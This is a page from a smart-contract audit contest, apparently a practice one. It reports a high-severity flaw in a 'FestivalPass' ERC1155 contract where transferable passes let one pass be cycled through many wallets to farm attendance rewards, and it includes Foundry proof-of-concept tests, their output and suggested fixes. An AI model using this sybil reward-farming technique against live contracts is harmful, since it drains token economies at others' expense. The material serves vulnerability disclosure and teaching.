Beatland Festival

AI First Flight #4

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-02] Per-address attendance tracking with transferable ERC1155 passes enables unlimited sybil reward farming

webrainsec

Description

Attendance tracking uses per-address mappings (hasAttended, lastCheckIn), but ERC1155 passes are freely transferable. A single pass can be cycled through N wallet addresses to collect N attendance rewards for the same performance. The protocol never restricts pass transfers and never tracks attendance per pass token, so each new holder is treated as a fresh attendee.

Vulnerability Details

// src/FestivalPass.sol, lines 29-30

mapping(uint256 => mapping(address => bool)) public hasAttended; // @> tracks by address, not by pass

mapping(address => uint256) public lastCheckIn; // @> tracks by address, not by pass

// src/FestivalPass.sol, lines 106-117

function attendPerformance(uint256 performanceId) external {

require(isPerformanceActive(performanceId), "Performance is not active");

require(hasPass(msg.sender), "Must own a pass");

require(!hasAttended[performanceId][msg.sender], "Already attended this performance"); // @> only checks THIS address

require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met");

hasAttended[performanceId][msg.sender] = true;

lastCheckIn[msg.sender] = block.timestamp;

uint256 multiplier = getMultiplier(msg.sender);

BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier);

// @> mints BEAT based on current holder's multiplier

}

ERC1155 passes (IDs 1, 2, 3) can be transferred via safeTransferFrom. FestivalPass does not override _update or safeTransferFrom to block transfers or carry over attendance state. When Alice transfers her pass to Bob, Bob's hasAttended[perfId][bob] is false and Bob's lastCheckIn[bob] is 0. Bob can attend the same performance and earn the full reward again.

Consider the following attack with a BACKSTAGE pass (3x multiplier, 100 BEAT base reward):

Alice buys 1 BACKSTAGE pass (pays 1 ETH, gets 15 BEAT welcome bonus)
Alice attends performance 0 and earns 300 BEAT (100 * 3)
Alice transfers her BACKSTAGE pass to Bob (a second address she controls)
Bob calls attendPerformance(0). hasAttended[0][bob] is false, so the check passes. Bob earns 300 BEAT.
Bob transfers to Charlie (a third address). Charlie attends and earns 300 BEAT.
Repeat for N addresses. Total BEAT minted: N * 300 from a single pass and a single performance.

Risk

Likelihood:

Creating additional addresses is free. The 1-hour cooldown (COOLDOWN = 1 hours) only applies per address, not per pass, so it doesn't protect against sybil addresses. Each new address starts with lastCheckIn = 0, immediately passing the cooldown check since block.timestamp >= 0 + 1 hours is always true after the first hour of deployment.

Impact:

Unlimited BEAT inflation. The attacker generates N * baseReward * multiplier BEAT per performance with a single pass purchase. The inflated BEAT is used to drain every memorabilia collection via redeemMemorabilia, which burns BEAT and mints unique NFTs. A BACKSTAGE pass with a 3x multiplier produces 300 BEAT per sybil address per performance. With 10 performances and 100 sybil addresses, that's 300,000 BEAT from a single 1 ETH pass.

Proof of Concept

The test demonstrates that 1 BACKSTAGE pass earns 900 BEAT for a single performance by cycling through 3 addresses (Alice, Bob, Charlie). Expected maximum for 1 pass is 300 BEAT.

function testExploit_CooldownBypass() public {

// Setup: BACKSTAGE pass (1 ETH, max 10), performance with 100 BEAT base reward

// Alice bought 1 BACKSTAGE pass and timestamp is at performance start

// Alice attends performance 0 — earns 100 * 3 = 300 BEAT (backstage multiplier)

vm.prank(alice);

festivalPass.attendPerformance(0);

uint256 aliceBeat = beatToken.balanceOf(alice);

assertEq(aliceBeat, 315e18, "Alice should have 315 BEAT (300 reward + 15 welcome bonus)");

// Alice transfers BACKSTAGE pass to Bob

vm.prank(alice);

festivalPass.safeTransferFrom(alice, bob, 3, 1, "");

// Bob attends the SAME performance — no prior attendance record for Bob

vm.prank(bob);

festivalPass.attendPerformance(0);

uint256 bobBeat = beatToken.balanceOf(bob);

assertEq(bobBeat, 300e18, "Bob earned 300 BEAT from same performance, same pass");

// Bob transfers to Charlie

vm.prank(bob);

festivalPass.safeTransferFrom(bob, charlie, 3, 1, "");

// Charlie attends the SAME performance

vm.prank(charlie);

festivalPass.attendPerformance(0);

uint256 charlieBeat = beatToken.balanceOf(charlie);

assertEq(charlieBeat, 300e18, "Charlie earned 300 BEAT from same performance, same pass");

// PROOF: 1 pass generated 900 BEAT for the same performance instead of 300

uint256 totalAttendanceRewards = (aliceBeat - 15e18) + bobBeat + charlieBeat;

assertEq(totalAttendanceRewards, 900e18,

"EXPLOIT PROVEN: 1 pass = 900 BEAT instead of 300 BEAT for same performance");

}

Output:

Alice BEAT total: 315

Bob BEAT total: 300

Charlie BEAT total: 300

Total attendance BEAT (1 pass): 900

Expected max BEAT (1 pass): 300

Recommendations

Make festival passes non-transferable (soulbound) by overriding _update to block transfers between non-zero addresses:

+ function _update(

+ address from,

+ address to,

+ uint256[] memory ids,

+ uint256[] memory values

+ ) internal override {

+ for (uint256 i = 0; i < ids.length; i++) {

+ // Block transfers of pass tokens (IDs 1-3). Minting (from=0) and burning (to=0) still allowed.

+ if (ids[i] <= BACKSTAGE_PASS && from != address(0) && to != address(0)) {

+ revert("Passes are non-transferable");

+ }

+ super._update(from, to, ids, values);

+ }

Alternatively, track attendance per pass token ID instead of per address, though this is more complex with ERC1155's fungible-within-ID model.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 8 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Pass Lending Reward Multiplication Enables Unlimited Performance Rewards

# Root + Impact ## Description * The `attendPerformance()` function is designed to reward pass holders for attending performances, with VIP and BACKSTAGE passes receiving multiplied rewards based on their tier. Under normal operation, each pass should generate rewards for a single attendee per performance, maintaining balanced tokenomics where one pass purchase corresponds to one set of performance rewards throughout the festival. * However, the attendance system tracks attendance per user rather than per pass, while pass ownership validation occurs only at the moment of attendance through `hasPass()`. This allows coordinated users to share a single pass by strategically transferring it between attendees, enabling multiple users to attend the same performance with the same pass and each receive full multiplied rewards, effectively turning one pass purchase into unlimited reward generation. ```Solidity function attendPerformance(uint256 performanceId) external { require(isPerformanceActive(performanceId), "Performance is not active"); @> require(hasPass(msg.sender), "Must own a pass"); // Only checks current ownership @> require(!hasAttended[performanceId][msg.sender], "Already attended this performance"); // Per-user tracking require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met"); @> hasAttended[performanceId][msg.sender] = true; // Marks user as attended lastCheckIn[msg.sender] = block.timestamp; uint256 multiplier = getMultiplier(msg.sender); BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier); } function hasPass(address user) public view returns (bool) { @> return balanceOf(user, GENERAL_PASS) > 0 || balanceOf(user, VIP_PASS) > 0 || balanceOf(user, BACKSTAGE_PASS) > 0; // Only checks current balance } ``` The vulnerability exists in the combination of per-user attendance tracking (`hasAttended[performanceId][msg.sender]`) and point-in-time pass ownership validation (`hasPass(msg.sender)`). The system records that a specific user attended a specific performance, but does not track which pass was used or prevent the same pass from being used by multiple users for the same performance through transfers. ## Risk **Likelihood**: * The vulnerability requires coordination between multiple users and strategic timing of pass transfers during active performance windows, which demands planning and cooperation rather than simple individual exploitation. * The attack becomes immediately executable once multiple users coordinate, as ERC1155 transfers are permissionless and the attendance system provides no restrictions on pass transfers between attendance events. **Impact**: * Unlimited reward farming from single pass purchases enables coordinated groups to multiply performance rewards indefinitely (demonstrated: 4x-10x reward multiplication), completely breaking the intended pass-to-reward ratio and causing massive BEAT token inflation. * Complete bypass of cooldown mechanisms and attendance restrictions through pass lending, allowing rapid reward extraction and undermining all intended rate-limiting protections designed to prevent reward farming abuse. ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity 0.8.25; import "forge-std/Test.sol"; import "../src/FestivalPass.sol"; import "../src/BeatToken.sol"; import {console} from "forge-std/console.sol"; /** * @title Pass Lending Reward Multiplication PoC * @dev Demonstrates how single pass can generate unlimited rewards across multiple users * through strategic pass transfers and coordinated attendance * * VULNERABILITY: No ownership tracking during attendance * - hasPass() only checks current balance at time of attendance * - attendPerformance() tracks attendance per user, not per pass * - Single pass can be transferred between users for unlimited reward farming * * ATTACK VECTOR: * 1. Alice buys 1 VIP pass and attends performance → earns 2x rewards * 2. Alice transfers pass to Bob * 3. Bob attends same performance → earns 2x rewards * 4. Bob transfers pass to Charlie → Charlie attends → repeat * 5. Single pass generates unlimited rewards across unlimited users */ contract PassLendingExploitPoC is Test { FestivalPass public festivalPass; BeatToken public beatToken; address public owner; address public organizer; address public alice; address public bob; address public charlie; address public dave; // Pass configuration for maximum reward exploitation uint256 constant VIP_PRICE = 0.1 ether; uint256 constant VIP_MAX_SUPPLY = 1000; uint256 constant VIP_PASS = 2; uint256 constant VIP_MULTIPLIER = 2; // 2x rewards uint256 public performanceId; uint256 constant BASE_REWARD = 100e18; uint256 constant EXPECTED_VIP_REWARD = BASE_REWARD * VIP_MULTIPLIER; // 200 BEAT function setUp() public { owner = makeAddr("owner"); organizer = makeAddr("organizer"); alice = makeAddr("alice"); bob = makeAddr("bob"); charlie = makeAddr("charlie"); dave = makeAddr("dave"); // Deploy protocol vm.startPrank(owner); beatToken = new BeatToken(); festivalPass = new FestivalPass(address(beatToken), organizer); beatToken.setFestivalContract(address(festivalPass)); vm.stopPrank(); // Configure VIP pass vm.prank(organizer); festivalPass.configurePass(VIP_PASS, VIP_PRICE, VIP_MAX_SUPPLY); // Create a performance for exploitation vm.prank(organizer); performanceId = festivalPass.createPerformance( block.timestamp + 1 hours, // starts in 1 hour 4 hours, // lasts 4 hours BASE_REWARD // base reward ); // Fund Alice to buy the pass vm.deal(alice, 1 ether); } function testSinglePassMultipleRewards() public { console.log("=== PASS LENDING REWARD MULTIPLICATION EXPLOIT ===\n"); // Alice buys single VIP pass console.log("--- Setup: Alice buys 1 VIP pass ---"); vm.prank(alice); festivalPass.buyPass{value: VIP_PRICE}(VIP_PASS); console.log("Alice VIP balance:", festivalPass.balanceOf(alice, VIP_PASS)); console.log("Alice BEAT balance (welcome bonus):", beatToken.balanceOf(alice)); // Warp to performance time vm.warp(block.timestamp + 2 hours); console.log("\n--- Performance starts, exploitation begins ---"); // STEP 1: Alice attends performance and earns rewards console.log("STEP 1: Alice attends performance"); vm.prank(alice); festivalPass.attendPerformance(performanceId); uint256 aliceReward = beatToken.balanceOf(alice) - 5e18; // subtract welcome bonus console.log("Alice attendance reward:", aliceReward); console.log("Alice has attended:", festivalPass.hasAttended(performanceId, alice)); // STEP 2: Alice transfers pass to Bob console.log("\nSTEP 2: Alice transfers VIP pass to Bob"); vm.prank(alice); festivalPass.safeTransferFrom(alice, bob, VIP_PASS, 1, ""); console.log("Alice VIP balance:", festivalPass.balanceOf(alice, VIP_PASS)); console.log("Bob VIP balance:", festivalPass.balanceOf(bob, VIP_PASS)); console.log("Bob has pass:", festivalPass.hasPass(bob)); // STEP 3: Bob attends SAME performance with transferred pass console.log("\nSTEP 3: Bob attends SAME performance with transferred pass"); vm.prank(bob); festivalPass.attendPerformance(performanceId); uint256 bobReward = beatToken.balanceOf(bob); console.log("Bob attendance reward:", bobReward); console.log("Bob has attended:", festivalPass.hasAttended(performanceId, bob)); // STEP 4: Bob transfers pass to Charlie console.log("\nSTEP 4: Bob transfers VIP pass to Charlie"); vm.prank(bob); festivalPass.safeTransferFrom(bob, charlie, VIP_PASS, 1, ""); // STEP 5: Charlie attends SAME performance console.log("\nSTEP 5: Charlie attends SAME performance"); vm.prank(charlie); festivalPass.attendPerformance(performanceId); uint256 charlieReward = beatToken.balanceOf(charlie); console.log("Charlie attendance reward:", charlieReward); // STEP 6: Charlie transfers to Dave for final demonstration console.log("\nSTEP 6: Charlie transfers to Dave"); vm.prank(charlie); festivalPass.safeTransferFrom(charlie, dave, VIP_PASS, 1, ""); vm.prank(dave); festivalPass.attendPerformance(performanceId); uint256 daveReward = beatToken.balanceOf(dave); console.log("Dave attendance reward:", daveReward); // Calculate total exploitation console.log("\n=== EXPLOITATION RESULTS ==="); uint256 totalRewards = aliceReward + bobReward + charlieReward + daveReward; uint256 legitimateReward = EXPECTED_VIP_REWARD; // Only 1 person should get rewards console.log("Total BEAT farmed from 1 pass:", totalRewards); console.log("Legitimate reward (1 person):", legitimateReward); console.log("Reward multiplication factor:", totalRewards / legitimateReward); console.log("Excess BEAT stolen:", totalRewards - legitimateReward); // Verify the exploit assertEq(aliceReward, EXPECTED_VIP_REWARD, "Alice should get VIP reward"); assertEq(bobReward, EXPECTED_VIP_REWARD, "Bob should get VIP reward"); assertEq(charlieReward, EXPECTED_VIP_REWARD, "Charlie should get VIP reward"); assertEq(daveReward, EXPECTED_VIP_REWARD, "Dave should get VIP reward"); assertEq(totalRewards, 4 * legitimateReward, "4x reward multiplication"); // Show that attendance tracking is per-user, not per-pass console.log("\nAttendance tracking per user:"); console.log("Alice attended:", festivalPass.hasAttended(performanceId, alice)); console.log("Bob attended:", festivalPass.hasAttended(performanceId, bob)); console.log("Charlie attended:", festivalPass.hasAttended(performanceId, charlie)); console.log("Dave attended:", festivalPass.hasAttended(performanceId, dave)); // Current pass holder console.log("Final pass holder (Dave):", festivalPass.balanceOf(dave, VIP_PASS)); } function testLargeScalePassLendingRing() public { console.log("=== LARGE-SCALE PASS LENDING RING ===\n"); // Alice buys single BACKSTAGE pass (highest multiplier) uint256 BACKSTAGE_PRICE = 0.25 ether; uint256 BACKSTAGE_PASS = 3; uint256 BACKSTAGE_MULTIPLIER = 3; vm.prank(organizer); festivalPass.configurePass(BACKSTAGE_PASS, BACKSTAGE_PRICE, 100); vm.deal(alice, 1 ether); vm.prank(alice); festivalPass.buyPass{value: BACKSTAGE_PRICE}(BACKSTAGE_PASS); // Create multiple performances for maximum exploitation vm.startPrank(organizer); uint256 perf1 = festivalPass.createPerformance(block.timestamp + 1 hours, 6 hours, BASE_REWARD); uint256 perf2 = festivalPass.createPerformance(block.timestamp + 2 hours, 6 hours, BASE_REWARD); vm.stopPrank(); // Create lending ring of 10 users address[] memory lendingRing = new address[](10); for (uint256 i = 0; i < 10; i++) { lendingRing[i] = makeAddr(string(abi.encodePacked("user", i))); } lendingRing[0] = alice; // Alice starts with the pass console.log("Lending ring size:", lendingRing.length); console.log("BACKSTAGE pass multiplier:", BACKSTAGE_MULTIPLIER); console.log("Expected reward per attendance:", BASE_REWARD * BACKSTAGE_MULTIPLIER); // Exploit Performance 1 vm.warp(block.timestamp + 90 minutes); console.log("\n--- Exploiting Performance 1 ---"); for (uint256 i = 0; i < lendingRing.length; i++) { address currentUser = lendingRing[i]; // User attends performance vm.prank(currentUser); festivalPass.attendPerformance(perf1); uint256 reward = beatToken.balanceOf(currentUser); if (i == 0) reward -= 15e18; // subtract Alice's welcome bonus console.log("User", i, "reward:", reward); // Transfer to next user (except last) if (i < lendingRing.length - 1) { address nextUser = lendingRing[i + 1]; vm.prank(currentUser); festivalPass.safeTransferFrom(currentUser, nextUser, BACKSTAGE_PASS, 1, ""); } } // Wait for cooldown and exploit Performance 2 vm.warp(block.timestamp + 2 hours); console.log("\n--- Exploiting Performance 2 ---"); // Start from last user who has the pass address currentHolder = lendingRing[lendingRing.length - 1]; for (uint256 i = 0; i < lendingRing.length; i++) { vm.prank(currentHolder); festivalPass.attendPerformance(perf2); // Transfer to next user for continued exploitation if (i < lendingRing.length - 1) { address nextUser = lendingRing[i]; vm.prank(currentHolder); festivalPass.safeTransferFrom(currentHolder, nextUser, BACKSTAGE_PASS, 1, ""); currentHolder = nextUser; } } // Calculate total damage console.log("\n=== LARGE-SCALE EXPLOITATION RESULTS ==="); uint256 totalBEATFarmed = 0; for (uint256 i = 0; i < lendingRing.length; i++) { uint256 userBalance = beatToken.balanceOf(lendingRing[i]); if (i == 0) userBalance -= 15e18; // subtract welcome bonus totalBEATFarmed += userBalance; console.log("User", i, "total BEAT:", userBalance); } uint256 legitimateTotal = 2 * BASE_REWARD * BACKSTAGE_MULTIPLIER; // 2 performances, 1 person console.log("Total BEAT farmed:", totalBEATFarmed); console.log("Legitimate total (2 performances, 1 person):", legitimateTotal); console.log("Exploitation multiplier:", totalBEATFarmed / legitimateTotal); assertGe(totalBEATFarmed, legitimateTotal * 10, "Should farm >=10x legitimate rewards"); } function testCooldownBypassThroughLending() public { console.log("=== COOLDOWN BYPASS THROUGH PASS LENDING ===\n"); // Alice buys VIP pass vm.prank(alice); festivalPass.buyPass{value: VIP_PRICE}(VIP_PASS); // Create overlapping performances to test cooldown bypass vm.startPrank(organizer); uint256 perf1 = festivalPass.createPerformance(block.timestamp + 1 hours, 3 hours, BASE_REWARD); uint256 perf2 = festivalPass.createPerformance(block.timestamp + 1 hours, 3 hours, BASE_REWARD); vm.stopPrank(); vm.warp(block.timestamp + 90 minutes); // Alice attends performance 1 console.log("Alice attends performance 1"); vm.prank(alice); festivalPass.attendPerformance(perf1); console.log("Alice lastCheckIn:", festivalPass.lastCheckIn(alice)); // Alice tries to attend performance 2 immediately (should fail due to cooldown) console.log("\nAlice tries performance 2 immediately:"); vm.prank(alice); vm.expectRevert("Cooldown period not met"); festivalPass.attendPerformance(perf2); console.log(" Cooldown protection working"); // Alice transfers pass to Bob to bypass cooldown console.log("\nAlice transfers pass to Bob to bypass cooldown"); vm.prank(alice); festivalPass.safeTransferFrom(alice, bob, VIP_PASS, 1, ""); // Bob can immediately attend performance 2 (no cooldown for Bob) console.log("Bob attends performance 2 immediately:"); vm.prank(bob); festivalPass.attendPerformance(perf2); uint256 bobReward = beatToken.balanceOf(bob); console.log("Bob reward:", bobReward); console.log("Bob lastCheckIn:", festivalPass.lastCheckIn(bob)); console.log("\n=== COOLDOWN BYPASS RESULTS ==="); console.log("Alice could not attend due to cooldown"); console.log("Bob successfully attended immediately after transfer"); console.log("Cooldown mechanism bypassed through pass lending"); assertEq(bobReward, EXPECTED_VIP_REWARD, "Bob should successfully earn rewards"); assertEq(festivalPass.lastCheckIn(bob), block.timestamp, "Bob's check-in should be recorded"); } } ``` ```Solidity forge test --match-contract PassLendingExploitPoC -vv [⠰] Compiling... [⠃] Compiling 1 files with Solc 0.8.25 [⠊] Solc 0.8.25 finished in 442.56ms Compiler run successful! Ran 3 tests for test/PassLendingExploit.t.sol:PassLendingExploitPoC [PASS] testCooldownBypassThroughLending() (gas: 473221) Logs: === COOLDOWN BYPASS THROUGH PASS LENDING === Alice attends performance 1 Alice lastCheckIn: 5401 Alice tries performance 2 immediately: Cooldown protection working Alice transfers pass to Bob to bypass cooldown Bob attends performance 2 immediately: Bob reward: 200000000000000000000 Bob lastCheckIn: 5401 === COOLDOWN BYPASS RESULTS === Alice could not attend due to cooldown Bob successfully attended immediately after transfer Cooldown mechanism bypassed through pass lending [PASS] testLargeScalePassLendingRing() (gas: 1794585) Logs: === LARGE-SCALE PASS LENDING RING === Lending ring size: 10 BACKSTAGE pass multiplier: 3 Expected reward per attendance: 300000000000000000000 --- Exploiting Performance 1 --- User 0 reward: 300000000000000000000 User 1 reward: 300000000000000000000 User 2 reward: 300000000000000000000 User 3 reward: 300000000000000000000 User 4 reward: 300000000000000000000 User 5 reward: 300000000000000000000 User 6 reward: 300000000000000000000 User 7 reward: 300000000000000000000 User 8 reward: 300000000000000000000 User 9 reward: 300000000000000000000 --- Exploiting Performance 2 --- === LARGE-SCALE EXPLOITATION RESULTS === User 0 total BEAT: 600000000000000000000 User 1 total BEAT: 600000000000000000000 User 2 total BEAT: 600000000000000000000 User 3 total BEAT: 600000000000000000000 User 4 total BEAT: 600000000000000000000 User 5 total BEAT: 600000000000000000000 User 6 total BEAT: 600000000000000000000 User 7 total BEAT: 600000000000000000000 User 8 total BEAT: 600000000000000000000 User 9 total BEAT: 600000000000000000000 Total BEAT farmed: 6000000000000000000000 Legitimate total (2 performances, 1 person): 600000000000000000000 Exploitation multiplier: 10 [PASS] testSinglePassMultipleRewards() (gas: 567999) Logs: === PASS LENDING REWARD MULTIPLICATION EXPLOIT === --- Setup: Alice buys 1 VIP pass --- Alice VIP balance: 1 Alice BEAT balance (welcome bonus): 5000000000000000000 --- Performance starts, exploitation begins --- STEP 1: Alice attends performance Alice attendance reward: 200000000000000000000 Alice has attended: true STEP 2: Alice transfers VIP pass to Bob Alice VIP balance: 0 Bob VIP balance: 1 Bob has pass: true STEP 3: Bob attends SAME performance with transferred pass Bob attendance reward: 200000000000000000000 Bob has attended: true STEP 4: Bob transfers VIP pass to Charlie STEP 5: Charlie attends SAME performance Charlie attendance reward: 200000000000000000000 STEP 6: Charlie transfers to Dave Dave attendance reward: 200000000000000000000 === EXPLOITATION RESULTS === Total BEAT farmed from 1 pass: 800000000000000000000 Legitimate reward (1 person): 200000000000000000000 Reward multiplication factor: 4 Excess BEAT stolen: 600000000000000000000 Attendance tracking per user: Alice attended: true Bob attended: true Charlie attended: true Dave attended: true Final pass holder (Dave): 1 Suite result: ok. 3 passed; 0 failed; 0 skipped; finished in 2.49ms (2.14ms CPU time) Ran 1 test suite in 4.56ms (2.49ms CPU time): 3 tests passed, 0 failed, 0 skipped (3 total tests) ``` ## Recommended Mitigation The fix implements per-pass attendance tracking to ensure each individual pass can only be used once per performance, regardless of how many times it's transferred between users. This preserves the intended 1-pass-1-reward economics while still allowing legitimate pass transfers for other purposes, preventing coordinated reward multiplication while maintaining the flexibility of the ERC1155 standard. ```diff contract FestivalPass is ERC1155, Ownable2Step, IFestivalPass { // ... existing state variables ... + mapping(uint256 => mapping(uint256 => bool)) public passUsedForPerformance; // performanceId => passTokenId => used function attendPerformance(uint256 performanceId) external { require(isPerformanceActive(performanceId), "Performance is not active"); require(hasPass(msg.sender), "Must own a pass"); require(!hasAttended[performanceId][msg.sender], "Already attended this performance"); require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met"); + // Check which pass type the user owns and mark it as used + uint256 userPassId = getUserPassId(msg.sender); + require(!passUsedForPerformance[performanceId][userPassId], "This pass already used for this performance"); + passUsedForPerformance[performanceId][userPassId] = true; hasAttended[performanceId][msg.sender] = true; lastCheckIn[msg.sender] = block.timestamp; uint256 multiplier = getMultiplier(msg.sender); BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier); emit Attended(msg.sender, performanceId, performances[performanceId].baseReward * multiplier); } + function getUserPassId(address user) internal view returns (uint256) { + if (balanceOf(user, BACKSTAGE_PASS) > 0) return BACKSTAGE_PASS; + if (balanceOf(user, VIP_PASS) > 0) return VIP_PASS; + if (balanceOf(user, GENERAL_PASS) > 0) return GENERAL_PASS; + revert("User has no pass"); + } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!